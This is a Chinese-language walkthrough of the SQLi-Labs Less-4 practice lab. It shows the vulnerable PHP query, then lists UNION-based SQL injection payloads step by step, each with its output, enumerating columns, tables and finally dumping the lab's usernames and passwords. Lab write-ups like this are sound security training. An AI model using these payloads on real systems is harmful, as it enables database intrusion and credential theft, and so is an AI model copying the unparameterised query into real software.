sqlilabs_4

查看源代码：

if(isset($_GET['id']))

$id = '"' . $id . '"';

$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

if($row)

{echo 'Your Login name:'. $row['username'];

 echo 'Your Password:' .$row['password'];}

else 

{print_r(mysqli_error($con));}

输入形式为GET，注入格式为?id=1") and 1=1 --+且当正确时会显示Your Login name:和Your Password:，错误时不会显示任何东西

列数：

?id=1") order by 1 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 2 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 3 --+

Your Login name:Dumb

Your Password:Dumb

?id=1") order by 4 --+

Unknown column '4' in 'order clause'

即列数为3

数据显示位置：

?id=0") union select 1,2,3 --+

Your Login name:2

Your Password:3

目前使用库名：

?id=0") union select 1,database(),3 --+

Your Login name:security

Your Password:3

即目前库名为security

security库中的所有表名：

?id=0") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

Your Login name:2

Your Password:emails,referers,uagents,users

即security库中有emails,referers,uagents,users共4个表

users表中的所有列名：

?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

Your Login name:2

Your Password:USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password

即users表中有USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password共6个列

username列中的所有值：

?id=0") union select 1,group_concat(username),3 from users --+

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5

Your Password:3

即username列中有Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4,admin5共14个值

password列中的所有值：

?id=0") union select 1,2,group_concat(password) from users --+

Your Login name:2

Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5

即password列中有Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4,admin5共14个值